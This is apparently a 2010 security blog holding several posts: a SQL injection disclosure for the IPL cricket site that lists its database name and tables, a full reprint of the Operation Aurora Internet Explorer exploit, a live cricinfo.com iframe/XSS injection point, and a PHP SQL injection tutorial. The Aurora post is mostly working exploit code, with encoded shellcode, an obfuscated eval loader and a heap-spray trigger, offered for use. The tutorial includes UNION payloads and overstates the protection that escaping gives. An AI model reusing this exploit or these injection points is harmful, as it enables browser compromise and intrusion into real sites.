Vulnerability on IPL web portal.
SharePentested result: http://www.iplt20.com
Date: 14/03/2010
Notify to admins: YES
Database Version: MySQL >=5
Name Of DataBase: ipl2010live
Total Tables: 83
Credit : Shahee Mirza
Greetings : Gazi Lenin, learned many things from his tweets 
Note: I did not read or dump any data from that database.
——-
Only Table List here:
——————————————————————
fixtures
lm_data
lm_hotels
lm_rooms
lm_venues
players_workload
slideshow
tbl_accreditation
tbl_ads
tbl_article_video_keywords
tbl_background
tbl_bb_comments
tbl_bb_invites
tbl_bb_invites_data
tbl_bb_invites_text
tbl_bb_invites_tickets
tbl_bb_users
tbl_camerafan
tbl_cloud
tbl_coaching_staff
tbl_comments
tbl_contacts
tbl_dugout
tbl_features
tbl_feed_live_match
tbl_feed_match
tbl_feed_match_innings
tbl_feed_match_innings_ballbyball
tbl_feed_match_innings_batting
tbl_feed_match_innings_bowling
tbl_feed_match_teams
tbl_feed_match_teams_players
tbl_feed_match_umpire
tbl_feed_running
tbl_files
tbl_gallery
tbl_gallery_images
tbl_governingbody
tbl_home_gallery
tbl_homepage
tbl_interviews
tbl_iplteams
tbl_lm_friendinvites
tbl_main_panel_news
tbl_main_panel_now
tbl_main_panel_videos
tbl_master_slave
tbl_matches
tbl_news
tbl_pages
tbl_panel_left
tbl_player_profile
tbl_player_profile_new
tbl_player_stats
tbl_poll_results
tbl_polls_answer_options
tbl_polls_question
tbl_rating
tbl_rs_invites
tbl_rs_invites_text
tbl_teams
tbl_tickets
tbl_trivia
tbl_tv
tbl_user_subscription
tbl_venues
tbl_videos
tbl_wallpaper
tbl_weather
tbladminusers
tblsession
tbluserlogs
wp_commentmeta
wp_comments
wp_links
wp_options
wp_postmeta
wp_posts
wp_term_relationships
wp_term_taxonomy
wp_terms
wp_usermeta
wp_users
——————————————————————
******
Notification sent to info-iplt20 [at] iplt20.com
******
Operation Aurora- Used on Google to hack.
Share
The buzzed news hit earlier this week that the attack vector that allowed bad actors presumably from China into the networks of Google, Juniper, Adobe, and some 29 other firms was an Internet Explorer zero day, a use after free vulnerability on an invalid pointer reference affecting IE 6, 7, and 8 but only used by attackers on IE 6 according to Microsoft. Per Microsoft’s Advisory 979352: “In a specially-crafted attack, in attempting to access a freed object, Internet Explorer can be caused to allow remote code execution.
This attack got a name, “Operation Auroraâ€. And everybody interested to know how it done a successful attacks into corporate.
Ok, no more talk…. Here is the “EXPLOIT CODEâ€. 
<html><script>var sc = unescape("
%u9090%u19eb%u4b5b%u3390%u90c9%u7b80%ue901%u0175%u66c3%u7bb9%u8004%u0b34%ue2d8%uebfa%ue805
%uffe2%uffff%u3931%ud8db%u87d8%u79bc%ud8e8%ud8d8%u9853%u53d4%uc4a8%u5375%ud0b0%u2f53%ud7b2
%u3081%udb59%ud8d8%u3a48%ub020%ueaeb%ud8d8%u8db0%ubdab%u8caa%u9e53%u30d4%uda37%ud8d8%u3053
%ud9b2%u3081%udbb9%ud8d8%u213a%ub7b0%ud8b6%ub0d8%uaaad%ub5b4%u538c%ud49e%u0830%ud8da%u53d8
%ub230%u81d9%u9a30%ud8db%u3ad8%ub021%uebb4%ud8ea%uabb0%ubdb0%u8cb4%u9e53%u30d4%uda69%ud8d8
%u3053%ud9b2%u3081%udbfb%ud8d8%u213a%u3459%ud9d8%ud8d8%u0453%u1b59%ud858%ud8d8%ud8b2%uc2b2
%ub28b%u27d8%u9c8e%u18eb%u5898%udbe4%uadd8%u5121%u485e%ud8d8%u1fd8%udbdc%ub984%ubdf6%u9c1f
%udcdb%ubda0%ud8d8%u11eb%u8989%u8f8b%ueb89%u5318%u989e%u8630%ud8da%u5bd8%ud820%u5dd7%ud9a7
%ud8d8%ud8b2%ud8b2%udbb2%ud8b2%udab2%ud8b0%ud8d8%u8b18%u9e53%u30fc%udae5%ud8d8%u205b%ud727
%u865c%ud8d9%u51d8%ub89e%ud8b2%u2788%uf08e%u9e51%u53bc%u485e%ud8d8%u1fd8%udbdc%uba84%ubdf6
%u9c1f%udcdb%ubda0%ud8d8%ud8b2%ud8b2%udab2%ud8b2%ud8b2%ud8b0%ud8d8%u8b98%u9e53%u30fc%ud923
%ud8d8%u205b%ud727%uc45c%ud8d9%u51d8%u5c5e%ud8d8%u51d8%u5446%ud8d8%u53d8%ub89e%ud8b2%ud8b2
%ud8b2%u9e53%u88b8%u8e27%u1fe0%ua89e%ud8d8%ud8d8%u9e1f%ud8ac%ud8d8%u59d8%ud81f%ud8da%uebd8
%u5303%ubc86%ud8b2%u9e55%u88a8%ud8b0%ud8dc%u8fd8%uae27%u27b8%udc8e%u11eb%ud861%ud8dc%u58d8
%ud7a4%u4d27%ud4ac%ua458%u27d7%uacd8%u58dd%ud7ac%u4d27%u333a%u1b53%ud8f5%ud8dc%u5bd8%ud820
%udba7%u8651%ub2a8%u55d8%uac9e%u2788%ua8ae%u278f%u5c6e%ud8d8%u27d8%ue88e%u3359%udcd8%ud8d8
%u235b%ua7d8%u277d%ub8ae%u8e27%u27ec%u5c6e%ud8d8%u27d8%uec8e%u5e53%ud848%ud8d8%u4653%ud854
%ud8d8%udc1f%u84db%uf6b9%u8bbd%u8e27%u53f4%u5466%ud8d8%u53d8%u485e%ud8d8%u1fd8%udfdc%uba84
%ubdf6%u3459%ud9d8%ud8d8%u0453%ud8b0%ud8d9%u8bd8%
ud8b0%ud8d9%u8fd8%ud8b2%ud8b2%u8e27%u53c4
%ueb23%ueb18%u5903%ud834%ud8da%u53d8%u5b14%u8c20%ud0a5%uc451%u5bd9%udc18%u2b33%u1453%u0153
%u1b5b%uebc8%u8818%u8b89%u8888%u8888%u8888%u888f%u5388%ud09e%u2f30%ud8d8%u53d8%ue4a6%uec30
%ud8d9%u30d8%ud8ef%ud8d8%ubbb0%uafae%ub0d8%ub0ab%ub7bc%u538c%ud49e%u6e30%ud8d8%u51d8%ue49e
%u79bc%ud8dc%ud8d8%u7855%u27b8%u2727%ubdb2%uae27%u53e4%uc89e%u4230%ud8d8%uebd8%u8b03%u8b8b
%u278b%u3008%ud83d%ud8d8%u3459%ud9d8%ud8d8%u2453%u1f5b%u1fdc%ueadf%u49ac%u1fd4%udc9f%u51bb
%u9709%u9f1f%u78d0%u4fbd%u1f13%ud49f%u9889%ua762%u9f1f%ue6c8%u6ec5%u1fe1%ucc9f%ub160%uc30c
%u9f1f%u66c0%ubea7%u1f78%uc49f%u7124%u75ef%u9f1f%u40f8%uc8d2%ubc20%ue879%ud8d8%u53d8%ud498
%ua853%u75c4%ub053%u53d0%u512f%ubc8e%udcb2%u3081%ud87b%ud8d8%u3a48%ub020%ueaeb%ud8d8%u8db0
%ubdab%u8caa%ude53%uca30%ud8d8%u53d8%ub230%u81dd%u5c30%ud8d8%u3ad8%ueb21%u8f27%u8e27%u58dc
%u30e0%ue058%uad31%u59c9%udda0%u4848%u4848%ud0ac%u2753%u538d%u5534%udd98%u3827%ue030%ud8d8
%u1bd8%ue058%u5830%u31e0%uc9ad%ua059%u48dd%u4848%uac48%ub03f%ud2d0%ud8d8%u9855%u27dd%u3038
%ud8cf%ud8d8%u301b%ud8c9%ud8d8%uc960%udcd9%u1a58%ud8d4%uda33%u1b80%u2130%u2727%u8327%udf1e
%u5160%ud987%u1fbe%udd9f%u3827%u8b1b%u0453%ub28b%ub098%uc8d8%ud8d8%u538f%uf89e%u5e30%u2727
%u8027%u891b%u538e%ue4ad%uac53%ua0f6%u2ddb%u538e%uf8ae%u2ddb%u11eb%u9991%udb75%ueb1d%ud703
%uc866%u0ee2%ud0ac%u1319%udbdf%u9802%u2933%uc7e3%u3fad%u5386%ufc86%u05db%u53be%u93d4%u8653
%udbc4%u5305%u53dc%u1ddb%u8673%u1b81%uc230%u2724%u6a27%u3a2a%u6a2c%ud7ee%u28cb%ua390%ueae5
%u49ac%u5dd4%u7707%ubb63%u0951%u8997%u6298%udfa7%ufa4a%uc6a8%ubc7c%u4b37%u3cea%u564c%ud2cb
%ua174%u3ee1%u1c40%uc755%u8fac%ud5be%u9b27%u7466%u4003%uc8d2%u5820%u770e%u2342%ucd8b%ub0be
%uacac%ue2a8%uf7f7%ubdbc%ub7b5%uf6e9%uacbe%ub9a8%ubbbb%uabbd%uf6ab%ubbbb%ubcf7%ub5bd%uf7b7
%ubcb9%ub2f6%ubfa8%u00d8");
var sss = Array(826, 679, 798, 224, 770, 427, 819, 770, 707, 805, 693, 679, 784, 707, 280,
238, 259, 819, 336, 693, 336, 700, 259, 819, 336, 693, 336, 700, 238, 287, 413, 224, 833,
728, 735, 756, 707, 280, 770, 322, 756, 707, 770, 721, 812, 728, 420, 427, 371, 350, 364,
350, 392, 392, 287, 224, 770, 301, 427, 770, 413, 224, 770, 427, 770, 322, 805, 819, 686,
805, 812, 798, 735, 770, 721, 280, 336, 448, 371, 350, 364, 350, 378, 399, 315, 805, 693,
322, 756, 707, 770, 721, 812, 728, 287, 413, 826, 679, 798, 224, 840, 427, 770, 707, 833,
224, 455, 798, 798, 679, 847, 280, 287, 413, 224, 714, 777, 798, 280, 826, 679, 798, 224,
735, 427, 336, 413, 735, 420, 350, 336, 336, 413, 735, 301, 301, 287, 224, 861, 840, 637,
735, 651, 427, 770, 301, 805, 693, 413, 875);
var arr = new Array;
for (var i = 0; i < sss.length; i ++ ){
arr[i] = String.fromCharCode(sss[i]/7); } var cc=arr.toString();cc=cc.replace(/ ,/ g, ""
);
cc = cc.replace(/@/g, ",");
eval(cc);
var x1 = new Array();
for (i = 0; i < 200; i ++ ){
x1[i] = document.createElement("COMMENT");
x1[i].data = "abc";
}
;
var e1 = null;
function ev1(evt){
e1 = document.createEventObject(evt);
document.getElementById("sp1").innerHTML = "";
window.setInterval(ev2, 50);
}
function ev2(){
p = "
\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d
\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d
\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d";
for (i = 0; i < x1.length; i ++ ){
x1[i].data = p;
}
;
var t = e1.srcElement;
}
</script><span id="sp1"><IMG SRC="aaa.gif" onload="ev1(event)"></span></body></html>
Better if you download it from here.
Microsoft says:
“At this time, we are aware of limited, active attacks attempting to use this vulnerability against Internet Explorer 6. We have not seen attacks against other affected versions of Internet Explorer.â€
Cricinfo.com iframe vulnerability.
Share
00×01: Introduction
Cricinfo.com is the finest and most famous web portal for cricket. Cricinfo offers users the most comprehensive live coverage of international and domestic cricket available as well as an unparalleled stats database, quality editorial comment and analysis and is part of ESPN. We get lot of information from there. Such people like me, who have not any television at home keeps eyes on it.
00×02: Poc
I have tried to inject iframe on it. Proof of concept is below.
00×03: Details
Vulnerable URL is below.
http://www.cricinfo.com/ci/engine/current/series/index.html?season=[iframe/xss]
00×04: Greetings
Red-D3v1L ## Who discovered XSS vulnerability on “Cricinfo Games 1.0″.
00×05: Credit
SHAHEE MIRZA
SQL injection: attacks and defenses.
Share***Introduction:
This is awesome that attackers are using several methods to get into some restricted part of web applications. They are discovering new methods day by day.
But SQL injection is now widely spreading method to hack your web sites or web apps.
So here is the question, what is SQL injection?
## SQL injection is a code injection technique that helps attacker to get some vulnerable information from your database. Actually it happens on database layer. This vulnerability occurs on PHP and ASP scripts for mistake of its coder.
***Where and why this vulnerability happens:
## Your coder may forget or lazy to handle SQL query errors.
## Where malicious users can insert SQL syntax on form requests.
## Forget to filter SQL syntax.
## Can not determine type of SQL query string.
## This attack can be perform on anywhere of your application, even attacker don’t have to get a privileged account.
## Attack can be performing via cookie.
## Those dynamic pages which only pulls data from database directly.
## This vulnerability may be causes by your database server also.
***Types of SQL injection:
There are two types of SQL injection.
1.Injection into the variables that contain strings.
2.Injection into numeric variables.
Both are different than each other. I will describe about both and also how to avoid them.
*** 1. Injection into the variables that contain strings.
## Vulnerable code:
OK, just imagine that you wrote an application that have a page that fetches member’s credits according to his login name. The username will gone one page to another via URL, actually method of $_ GET [‘variable’];
$cred = $_GET['name'];
$result = mysql_query("SELECT credit FROM user WHERE username='$cred'");
This script has SQL injection vulnerability. An attacker can abuse it, just putting a SQL query beside the username in URL.
‘ UNION SELECT password FROM admin WHERE id=1
This will pull password of an admin user who has id number 1 as an example.
## Solution:
To avoid this type of attack is very simple. So many times it has been described by so many security experts. You have to use a function mysql_real_escape_string().What does it do? mysql_real_escape_string() function adds “\â€Â to following characters:
NULL, \ x00, \ n, \ r, \, ', " and \ X1A
So, look out that vulnerable code with mysql_real_escape_string() .
//
$cred = mysql_real_escape_string( $_GET['name']);
$result = mysql_query("SELECT credit FROM user WHERE username='$cred'");
This page is completely secure now.
## Attack again:
Now an attacker will attack on it like before.
‘ UNION SELECT password FROM admin WHERE id=1
But after using mysql_real_escape_string() funtion, this query looks like this.
\’ UNION SELECT password FROM admin WHEREÂ id=1
There is “\†character just added because of mysql_real_escape_string().
Somebody will advice you to use addslashes() function. But this function has some limitations.
##Please read these topics from PHP manual:
http://www.php.net/manual/en/function.addslashes.php
and
http://www.php.net/manual/en/mysqli.real-escape-string.php
and also.
http://www.php.net/manual/en/function.pg-escape-string.php
*** 2. Injection into numeric variables.
These types of SQL attacks are less know than first one. And not so well described by security experts. But it also comes with same disaster on your web applications.
## Vulnerable code:
Now time to describe this attack. Imagine again, you wrote a page that will display user’s credit according to his user id. The user id will gone one page to another via form posting, actually method of $_ POST [‘variable’];
$id = $_POST['id'];
$result = mysql_query("SELECT credit FROM user WHERE id=$id");
On this situation mysql_real_escape_string() will not protect you from SQL injection attack. Because now the $id variable is not quoted. This variable is containing numerical value. Now an attacker will use this type of SQL query.
2 UNION SELECT password FROM admin WHERE id=1
So, how could you protect web application from this attack? There are two things you can do.
1. You can change content to number, so that your variable will hold only numerical content.
2. You can check if the content is numerical then it may proceed to make a query.
## Solution:
To avoid this type of attack you can use these functions.
A. intval() function.
B. is_numeric() function.
Here I am describing about the benefit of intval() function.
// // $var='7ack3r'; //variable contain alphanumerical content $var2=intval($var); // filtered by intval() print $var2; // this will print only 7
Now you can change your code as like below.
$id = intval($_POST['id']);
$result = mysql_query("SELECT credit FROM user WHERE id=$id");
Yap, you have done your job. This will secure your web applications more than enough.
Now, I am going to describe the function name is_numeric().This function will check, is your variable contains a numerical content?
$id = $_POST['id'];
if (is_numeric($id))
{
$result = mysql_query("SELECT credit FROM user WHERE id=$id");
}
else
{
log_the_attack(); //this function will log all the information eg: ip, browser, time, date etc
echo "Ha ha ha, trying do something with me dude? You are logged honey";
}
function log_the_attack()
{
// bla bla bla
}
Here a question will arise that “What can I do now, what will use…. Intval() or is_numeric() ?â€
Answer will be “Its up to you, intval() is easy and saves the coding time but is_numeric() may kills some time. But this will help you to keep all the attack logsâ€.
Please read details from here:
1. http://www.php.net/manual/en/function.is-numeric.php
2. http://www.php.net/manual/en/function.intval.php
*** Conclusions:
Finally I am going finish this article. If you follow these steps, your application will be secure.
## Verify data types of all non-string user inputs.
## Escape all string inputs.
## Keep track of security violation attempts.
## Limit SQL user rights.
## Take database backups.
## Double check your codes.
## Always keep updated your database server.
###################
I AM CONFESSING THAT, I AM BAD IN ENGLISH.
IF I WROTE ANY WRONG INFORMATION IN MY ARTICLE, PLEASE INFORM ME .
###################
